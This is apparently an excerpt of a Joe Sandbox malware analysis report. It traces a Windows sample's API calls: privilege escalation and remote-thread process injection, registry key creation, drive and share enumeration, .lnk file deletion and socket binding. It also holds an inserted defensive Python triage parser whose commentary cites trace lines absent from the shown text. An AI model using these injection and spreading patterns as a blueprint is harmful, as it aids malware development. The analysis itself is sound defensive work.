                                                                                                            • Opcode ID: 27e276337a268eb91f7db6f3f4545d567f4ef4376a8fc81eec1e7ec5cd349fe8
                                                                                                            • Instruction ID: 5c9634388f8dad924b0a7613c6e1b3d90b05c3178a34d2f6475f0204477fcb2f
                                                                                                            • Opcode Fuzzy Hash: 27e276337a268eb91f7db6f3f4545d567f4ef4376a8fc81eec1e7ec5cd349fe8
                                                                                                            • Instruction Fuzzy Hash: 2B027DB5901268AFDF24DB64DC88BEAB779BF49700F0086D9E209E62D0D7749B94CF50

                                                                                                             Control-flow Graph

                                                                                                             (graph image not reproduced; block summary recovered from the graph data) Function 00901EF6, blocks 00901EF6-00902513. OpenProcess is attempted first; on failure the function calls GetLastError, GetVersionExA, GetCurrentThread/OpenThreadToken (or GetCurrentProcess/OpenProcessToken), LookupPrivilegeValueA and AdjustTokenPrivileges, then retries OpenProcess. With a process handle it calls OpenProcessToken, GetTokenInformation, GetProcessHeap/RtlAllocateHeap, GetTokenInformation again and LookupAccountSidA, then compares the account name with lstrcmpiA three times (the String ID for this function lists "local service", "network service" and "system"). A match leads to CreateMutexA; no match leads to VirtualAllocEx, WriteProcessMemory, CreateRemoteThread, a second VirtualAllocEx, subfunction 0090772B, lstrlen, WriteProcessMemory and CreateRemoteThread. Cleanup blocks call CloseHandle and GetProcessHeap/HeapFree.
                                                                                                            APIs
                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,0000000A), ref: 00901FE1
                                                                                                            • GetLastError.KERNEL32 ref: 00901FFA
                                                                                                            • GetVersionExA.KERNEL32(00000094), ref: 00902033
                                                                                                            • GetCurrentThread.KERNEL32 ref: 00902063
                                                                                                            • OpenThreadToken.ADVAPI32(00000000), ref: 0090206A
                                                                                                            • GetLastError.KERNEL32 ref: 00902074
                                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 009021B7
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 009024BB
                                                                                                            • CloseHandle.KERNEL32(?), ref: 009024DB
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009024F3
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 009024FA
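The API listings in this report (the RegOpenKeyExA/RegSetValueExA writes and the driver path built in the function starting at 00903C9C, the Sleep/GetLogicalDrives/GetDriveTypeA loop, and the OpenProcess/token sequence above) are plain text that a triage script can consume directly. The following Python is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses lines in the report's `API.MODULE(args), ref: ADDR` form, decodes the hex constants the trace shows raw (hive handles, KEY_ALL_ACCESS, REG_DWORD, PROCESS_ALL_ACCESS, GENERIC_READ/WRITE, PAGE_READWRITE, Sleep milliseconds) and tags the behaviours the Signatures section names. The sample input is copied from this page; the 10-second stalling threshold and the rule set are assumptions.

```python
import re

# Constructed sample input: lines copied from the API listings on this page,
# bullet markers included to show that the parser strips them.
SAMPLE_TRACE = r"""
• RegOpenKeyExA.KERNEL32(80000001,008F21D4,00000000,000F003F,00000000), ref: 00903D0B
• RegSetValueExA.KERNEL32(00000000,008F21C0,00000000,00000004,00000000,00000004), ref: 00903D3A
• RegOpenKeyExA.KERNEL32(80000002,008F22EC,00000000,000F003F,00000000), ref: 00903D67
• RegSetValueExA.KERNELBASE(00000000,008F274C,00000000,00000004,00000000,00000004), ref: 00903EAC
• wsprintfA.USER32 ref: 00903E1C
• GetSystemDirectoryA.KERNEL32(C:\Windows\system32\drivers\lrohpn.sys,00000080), ref: 009044C8
• CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00015400,008F2370), ref: 0090422A
• Part of subcall function 00902FFF: CreateFileA.KERNEL32(0090382E,40000000,00000002,00000000,00000004,00000020,00000000,?,0090382E), ref: 0090302B
• Sleep.KERNEL32(00004E20), ref: 009031AC
• GetLogicalDrives.KERNEL32 ref: 00903220
• GetDriveTypeA.KERNEL32(?), ref: 009032A3
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000020,00000000), ref: 009032E6
• OpenProcess.KERNEL32(001F0FFF,00000000,0000000A), ref: 00901FE1
"""

LINE_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)

# Win32 constants that the trace only shows as raw hex.
HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
REG_TYPES = {1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY", 4: "REG_DWORD"}
KEY_ALL_ACCESS = 0x000F003F
PROCESS_ALL_ACCESS = 0x001F0FFF
GENERIC_READ, GENERIC_WRITE = 0x80000000, 0x40000000
PAGE_READWRITE = 0x04
STALL_MS = 10_000  # assumed threshold for calling a Sleep a stall


def parse_trace(text):
    """Parse 'API.MODULE(args), ref: ADDR' lines into dicts; skip anything else."""
    calls = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()
        m = LINE_RE.match(line) if line else None
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append({"api": m["api"], "module": m["mod"], "args": args,
                      "ref": m["ref"].upper(), "subcall": m["sub"]})
    return calls


def hexarg(call, i):
    """Argument i as an int; None for '?', string arguments, or a missing argument."""
    try:
        return int(call["args"][i], 16)
    except (IndexError, ValueError):
        return None


def triage(calls):
    """Tag behaviours the report's signature section names. Returns (ref, api, note) tuples."""
    findings = []
    hive = "unknown hive"  # hive of the most recent RegOpenKeyExA
    for idx, c in enumerate(calls):
        api, ref = c["api"], c["ref"]
        if api == "RegOpenKeyExA":
            hive = HIVES.get(hexarg(c, 0), "unknown hive")
            if hexarg(c, 3) == KEY_ALL_ACCESS:  # samDesired
                findings.append((ref, api, f"opens {hive} key with KEY_ALL_ACCESS"))
        elif api == "RegSetValueExA":  # arg 3 is dwType
            findings.append((ref, api, f"writes {REG_TYPES.get(hexarg(c, 3), 'unknown type')} value under {hive}"))
        elif api == "GetSystemDirectoryA" and c["args"] and c["args"][0].lower().endswith(".sys"):
            findings.append((ref, api, f"builds driver path {c['args'][0]}"))
        elif api == "CreateFileMappingA" and hexarg(c, 2) == PAGE_READWRITE and hexarg(c, 5):
            findings.append((ref, api, f"creates named PAGE_READWRITE section of {hexarg(c, 4)} bytes"))
        elif api == "Sleep" and (hexarg(c, 0) or 0) >= STALL_MS:
            findings.append((ref, api, f"stalls for {hexarg(c, 0)} ms"))
        elif api == "GetLogicalDrives":
            if "GetDriveTypeA" in [x["api"] for x in calls[idx + 1:idx + 4]]:
                findings.append((ref, api, "enumerates drives and checks their type (removable-media infection loop)"))
        elif api == "CreateFileA":  # arg 1 is dwDesiredAccess
            mode = {GENERIC_READ: "read", GENERIC_WRITE: "write"}.get(hexarg(c, 1), "unknown access")
            findings.append((ref, api, f"opens file for {mode}"))
        elif api == "OpenProcess" and hexarg(c, 0) == PROCESS_ALL_ACCESS:
            findings.append((ref, api, f"opens PID {hexarg(c, 2)} with PROCESS_ALL_ACCESS"))
    return findings


if __name__ == "__main__":
    for ref, api, note in triage(parse_trace(SAMPLE_TRACE)):
        print(f"{ref}  {api:<20} {note}")
```

The rules key on decoded constants rather than on API names alone, which is what separates a benign RegSetValueExA from one that follows an HKLM open with KEY_ALL_ACCESS, or a 20 000 ms Sleep (0x4E20) from an ordinary short one. Unresolvable arguments (the report's `?` placeholders and string paths) decode to None so a rule never fires on them by accident.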
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: OpenProcess$CloseErrorHandleHeapLastThreadToken$CurrentFreeVersion
                                                                                                            • String ID: P$SeDebugPrivilege$local service$network service$system
                                                                                                            • API String ID: 3470919082-3830299594
                                                                                                            • Opcode ID: 865cec2aef168af06878f684d27511a6d98a0d1b696c144cf9357fdca1c12277
                                                                                                            • Instruction ID: 4df4ba10d8f5e6403fd7c296139e53c31c80cffcc19dbe1f4550cd10650bcf42
                                                                                                            • Opcode Fuzzy Hash: 865cec2aef168af06878f684d27511a6d98a0d1b696c144cf9357fdca1c12277
                                                                                                            • Instruction Fuzzy Hash: 7CF16C75A01218EFEB20DFA4CC4DBEEB778FB48725F104699E229A61D0D7B45A84CF50

                                                                                                            Control-flow Graph (graph data omitted): basic blocks 901060-9014d8; calls Sleep, lstrcat, FindFirstFileA, FindNextFileA, lstrlen, lstrcmpiA, lstrcpy, DeleteFileA, FindClose; subcalls 8f8deb, 900e71, 8fe329, 8fa26e, 900cf6 and a recursive call to 901060
                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(?,?), ref: 009010BF
                                                                                                            • lstrcat.KERNEL32(?,008F3D20), ref: 009010DD
                                                                                                            • lstrcat.KERNEL32(?,008F3D24), ref: 00901120
                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 0090112E
                                                                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00901149
                                                                                                            • Sleep.KERNEL32(?), ref: 00901199
                                                                                                            • lstrlen.KERNEL32(?), ref: 009011A6
                                                                                                            • lstrcat.KERNEL32(?,?), ref: 009011DB
                                                                                                            • lstrlen.KERNEL32(?), ref: 009011E5
                                                                                                            • lstrlen.KERNEL32(?), ref: 009011F8
                                                                                                            • lstrcmpiA.KERNEL32(00000000,008F26F0), ref: 00901214
                                                                                                            • lstrcmpiA.KERNEL32(00000000,008F26F8), ref: 0090122C
                                                                                                            • lstrcpy.KERNEL32(-0096B270,?), ref: 0090130C
                                                                                                            • lstrcat.KERNEL32(-0096B270,.lnk), ref: 0090132A
                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0090136E
                                                                                                            • lstrcpy.KERNEL32(?,?), ref: 009013B8
                                                                                                            • lstrlen.KERNEL32(?), ref: 009013C5
                                                                                                            • lstrcmpiA.KERNEL32(?,008F260C), ref: 009013ED
                                                                                                            • FindClose.KERNEL32(00000000), ref: 009014B5
                                                                                                            • Sleep.KERNEL32(00000400), ref: 009014C0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrcatlstrlen$FileFindSleeplstrcmpi$lstrcpy$CloseDeleteFirstNext
                                                                                                            • String ID: .lnk$.lnk$.lnk$.tmp$C:\Windows\$d
                                                                                                            • API String ID: 3707883041-2096895072
                                                                                                            • Opcode ID: 4fd493fdaa35d675bd6e8ed897bbbff63975b794789388c99cd7fd774f76b1dd
                                                                                                            • Instruction ID: 57a27262834eee6f9a34c3fede589f6f6e8912a58c3417791a6faf0159ff3a61
                                                                                                            • Opcode Fuzzy Hash: 4fd493fdaa35d675bd6e8ed897bbbff63975b794789388c99cd7fd774f76b1dd
                                                                                                            • Instruction Fuzzy Hash: 50D18AB5A00209AFCF14DF68DC84BAE7BB9FF48305F148219F915AB291D738E950CB64

                                                                                                            APIs
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00902545
                                                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 00902584
                                                                                                            • lstrlen.KERNEL32(?,00000002,00000000), ref: 009025A5
                                                                                                            • lstrcpyn.KERNEL32(00000000,?,00000040), ref: 009025C0
                                                                                                            • lstrcpy.KERNEL32(00000000,?), ref: 009025D6
                                                                                                            • CharLowerA.USER32(00000000), ref: 009025E3
                                                                                                            • lstrlen.KERNEL32(00000000,M_%d_,0000000A), ref: 009025FC
                                                                                                            • wsprintfA.USER32 ref: 0090260A
                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 0090261E
                                                                                                            • GetLastError.KERNEL32 ref: 0090262A
                                                                                                            • ReleaseMutex.KERNEL32(?), ref: 0090263D
                                                                                                            • CloseHandle.KERNEL32(?), ref: 0090264A
                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 0090267D
                                                                                                            • lstrlen.KERNEL32(?,00000000,00000128,00000002,00000000), ref: 0090269E
                                                                                                            • lstrcpyn.KERNEL32(00000000,?,00000040), ref: 009026B9
                                                                                                            • lstrcpy.KERNEL32(00000000,?), ref: 009026CF
                                                                                                            • CharLowerA.USER32(00000000), ref: 009026DC
                                                                                                            • lstrlen.KERNEL32(00000000,M_%d_,0000000A), ref: 009026F5
                                                                                                            • wsprintfA.USER32 ref: 00902703
                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00902717
                                                                                                            • GetLastError.KERNEL32 ref: 00902723
                                                                                                            • ReleaseMutex.KERNEL32(?), ref: 00902736
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00902743
                                                                                                            • CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 00902774
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Mutexlstrlen$CloseCreateHandle$CharErrorLastLowerProcess32Releaselstrcpylstrcpynwsprintf$FirstNextSnapshotToolhelp32
                                                                                                            • String ID: M_%d_$M_%d_
                                                                                                            • API String ID: 3105503624-485321427
                                                                                                            • Opcode ID: a3ac2236159a583fda0069eb98438a99fd13ea51410dfe5060f97fcebbe598f5
                                                                                                            • Instruction ID: d3484a3fd381e4cd8fc5f5121891272da1498823a3a61d54a71adb2cbf325244
                                                                                                            • Opcode Fuzzy Hash: a3ac2236159a583fda0069eb98438a99fd13ea51410dfe5060f97fcebbe598f5
                                                                                                            • Instruction Fuzzy Hash: 4B512FB5901218AFDF20DBA0DC8CBE9B778BF58701F1046DAE749A6190DBB49AC4CF50

                                                                                                            Control-flow Graph (graph data omitted): basic blocks 8fa2f5-8fa550; calls Sleep, GetTempPathA, lstrlen, lstrcat, lstrcpy, FindFirstFileA, FindNextFileA, lstrcmpiA, FindClose, RtlExitUserThread; subcalls 8f44cb, 8f4060, 8fa26e, 8fa2ad
                                                                                                            APIs
                                                                                                              • Part of subcall function 008F44CB: InterlockedExchange.KERNEL32(009090C0,?), ref: 008F44E9
                                                                                                            • Sleep.KERNEL32 ref: 008FA374
                                                                                                            • GetTempPathA.KERNEL32(00000100,00000000), ref: 008FA386
                                                                                                            • lstrlen.KERNEL32(00000000), ref: 008FA393
                                                                                                            • lstrcat.KERNEL32(00000000,008F3CAC), ref: 008FA3B2
                                                                                                            • lstrlen.KERNEL32(00000000), ref: 008FA3CC
                                                                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FA3E6
                                                                                                            • lstrcat.KERNEL32(00000000,008F3CB0), ref: 008FA3F8
                                                                                                            • FindFirstFileA.KERNEL32(00000000,00000000), ref: 008FA422
                                                                                                            • FindNextFileA.KERNELBASE(000000FF,00000000), ref: 008FA449
                                                                                                            • lstrcat.KERNEL32(00000000,?), ref: 008FA473
                                                                                                            • lstrlen.KERNEL32(00000000), ref: 008FA480
                                                                                                            • lstrlen.KERNEL32(?), ref: 008FA493
                                                                                                            • lstrcmpiA.KERNEL32(00000000,008F26F0), ref: 008FA4AF
                                                                                                            • lstrcmpiA.KERNEL32(00000000,_Rar), ref: 008FA4F3
                                                                                                            • Sleep.KERNEL32(00000100), ref: 008FA511
                                                                                                            • FindClose.KERNEL32(00000000), ref: 008FA52C
                                                                                                            • Sleep.KERNEL32(000927C0), ref: 008FA537
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 008FA544
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$FindSleeplstrcat$Filelstrcmpi$CloseExchangeExitFirstInterlockedNextPathTempThreadUserlstrcpy
                                                                                                            • String ID: _Rar
                                                                                                            • API String ID: 932915221-536834240
                                                                                                            • Opcode ID: 135c3a3bded27a035731bf55f6356754e7c49eda68753fc6a7a9ad56999d66af
                                                                                                            • Instruction ID: 8712ffe2504b32a956f07d94ac98a3faa33ae907961ecafd8f82ebf49c1f71b8
                                                                                                            • Opcode Fuzzy Hash: 135c3a3bded27a035731bf55f6356754e7c49eda68753fc6a7a9ad56999d66af
                                                                                                            • Instruction Fuzzy Hash: 4751ADB1901618ABDF24DBA4DC48BEE7779FF48705F0045A9E20EE6190DA74ABC4CF51
                                                                                                            APIs
                                                                                                            • htons.WS2_32(00000EB0), ref: 008F7AE9
                                                                                                            • socket.WS2_32(00000002,00000002,00000000), ref: 008F7B06
                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00001002,00100000,00000004), ref: 008F7B44
                                                                                                            • bind.WS2_32(?,00000002,00000010), ref: 008F7B5A
                                                                                                            • closesocket.WS2_32(?), ref: 008F7C31
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 008F7C39
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUserbindclosesockethtonssetsockoptsocket
                                                                                                            • String ID:
                                                                                                            • API String ID: 3895830221-0
                                                                                                            • Opcode ID: 1f456171f0ed5fd0199d58a4b0cbcf3251c77f4cad27b62b42c74b7e21bee3ef
                                                                                                            • Instruction ID: baa211eb9d86d8456da0e636d0fddc900653b874a8c1d590ddb47080d4fef89c
                                                                                                            • Opcode Fuzzy Hash: 1f456171f0ed5fd0199d58a4b0cbcf3251c77f4cad27b62b42c74b7e21bee3ef
                                                                                                            • Instruction Fuzzy Hash: F5513A70A05398AAEB209F64DD49BE9B7B4FF08740F1042D9E389EA290D7F45AC49F54
                                                                                                            APIs
                                                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 008F83EA
                                                                                                            • htons.WS2_32(00000E9D), ref: 008F840B
                                                                                                            • bind.WS2_32(000000FF,00000002,00000010), ref: 008F842C
                                                                                                            • closesocket.WS2_32(00000000), ref: 008F84A3
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 008F84AB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUserbindclosesockethtonssocket
                                                                                                            • String ID:
                                                                                                            • API String ID: 3582385377-0
                                                                                                            • Opcode ID: 021e8e8f83e1a13f489bd15e1f0ec72e475eee01810d0eb10172448bb08ef3cb
                                                                                                            • Instruction ID: 50214f005c36ed1edbdb5ee49cd55559d188f19495b42eff654720877ee0d994
                                                                                                            • Opcode Fuzzy Hash: 021e8e8f83e1a13f489bd15e1f0ec72e475eee01810d0eb10172448bb08ef3cb
                                                                                                            • Instruction Fuzzy Hash: 3331FA74A0030EEADB209FF49D0DBBEB774FF14715F20461AA715E62D0DA744640DB99
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 00987C02
                                                                                                            • GetProcAddress.KERNEL32(?,00984FF9), ref: 00987C20
                                                                                                            • ExitProcess.KERNEL32(?,00984FF9), ref: 00987C31
                                                                                                            • VirtualProtect.KERNEL32(008D0000,00001000,00000004,?,00000000), ref: 00987C7F
                                                                                                            • VirtualProtect.KERNEL32(008D0000,00001000), ref: 00987C94
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 1996367037-0
                                                                                                            • Opcode ID: b180505da8a0b05270ef15eea99eae92daf9fe259a48dd76382812d5722befce
                                                                                                            • Instruction ID: f4fc1837f583cc078622b1884a1b5e9fc0764162e1f0e4856e235d0e3abd2d6a
                                                                                                            • Opcode Fuzzy Hash: b180505da8a0b05270ef15eea99eae92daf9fe259a48dd76382812d5722befce
                                                                                                            • Instruction Fuzzy Hash: 1651E4726583124BD720BEF89CC06A4FBA9EB513247380B79C6E6C73C5E7A4D8068764

Control-flow Graph (legend: Executed, Not Executed)
APIs
• LoadLibraryExA.KERNELBASE(KERNEL32.DLL,00000000,00000000), ref: 004037E7
• SetErrorMode.KERNEL32(00008002), ref: 0040380E
• CreateFileMappingA.KERNEL32(-00000001,00000000,00000004,00000000,00008000,hh8geqpHJTkdns6), ref: 00403828
• CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00015400,purity_control_7728), ref: 00403842
• MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00015400), ref: 00403858
• CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00403DA9), ref: 004038A6
• Sleep.KERNEL32(0000000C), ref: 004038C1
• GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\RHxJqGoGFB.exe,000001FE), ref: 004038EB
• LoadLibraryExA.KERNELBASE(SHELL32.DLL,00000000,00000000), ref: 0040390A
• GetProcAddress.KERNELBASE(00000000,ShellExecuteA), ref: 00403918
• CreateMutexA.KERNEL32(00000000,00000000,Ap1mutx7), ref: 00403945
• GetLastError.KERNEL32(00000000), ref: 0040394C
• Sleep.KERNEL32(000927C0), ref: 0040395B
• ExitProcess.KERNEL32(00000000), ref: 00403963
Strings
Memory Dump Source
• Source File: 00000000.00000002.4171472191.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4168525358.0000000000400000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RHxJqGoGFB.jbxd
Similarity
• API ID: CreateFile$ErrorLibraryLoadMappingSleep$AddressExitLastModeModuleMutexNameProcProcessThreadView
• String ID: """"$3333$Ap1mutx7$C:\Users\user\Desktop\RHxJqGoGFB.exe$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
• API String ID: 3272623439-3078967841
• Opcode ID: 488a5f742d6fa30908eadc79c6102163c7347a3a0603545248698a45355f84f8
• Instruction ID: 33b87eccd636c6f659f4b5a06f682442ebdd106e99f0b365c98b3f3dd3420834
• Opcode Fuzzy Hash: 488a5f742d6fa30908eadc79c6102163c7347a3a0603545248698a45355f84f8
• Instruction Fuzzy Hash: 8C6160B1640289ABEF10DF60CD49FAA3B6CAF04706F544526FE09BE1E0D6B597448B1E

Control-flow Graph (legend: Executed, Not Executed)
APIs
• lstrcpy.KERNEL32(00000000,Software\Msoga), ref: 008F4E54
• lstrlen.KERNEL32(00000000,\%d,656E6F6A), ref: 008F4E78
• wsprintfA.USER32 ref: 008F4E86
• RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,?), ref: 008F4EA9
• RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 008F4ECA
Strings
Memory Dump Source
• Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
Similarity
• API ID: CreateOpenlstrcpylstrlenwsprintf
• String ID: Software\Msoga$\%d$joneC:\Windows\
• API String ID: 4004410694-4125127941
• Opcode ID: 18be3a0ac58c1eb4a5524539b84da1861c051f77df8d1f797457398cfec10e04
• Instruction ID: f74509515487c08cc7999c2e1c4c592c2203e6c03d79388618cc1889a6ec9462
• Opcode Fuzzy Hash: 18be3a0ac58c1eb4a5524539b84da1861c051f77df8d1f797457398cfec10e04
• Instruction Fuzzy Hash: 6E026EB590161CEBDB20DF64CC85BE9B779FB58304F0842D9E619A7281DB729B84CF50

Control-flow Graph (legend: Executed, Not Executed)
APIs
• Sleep.KERNEL32(00000400), ref: 009019FA
• WNetOpenEnumA.MPR(00000002,00000000,00000000,00909078,?), ref: 00901A11
• GlobalAlloc.KERNEL32(00000040,00007F80), ref: 00901A51
• WNetEnumResourceA.MPR(?,?,?,?), ref: 00901A92
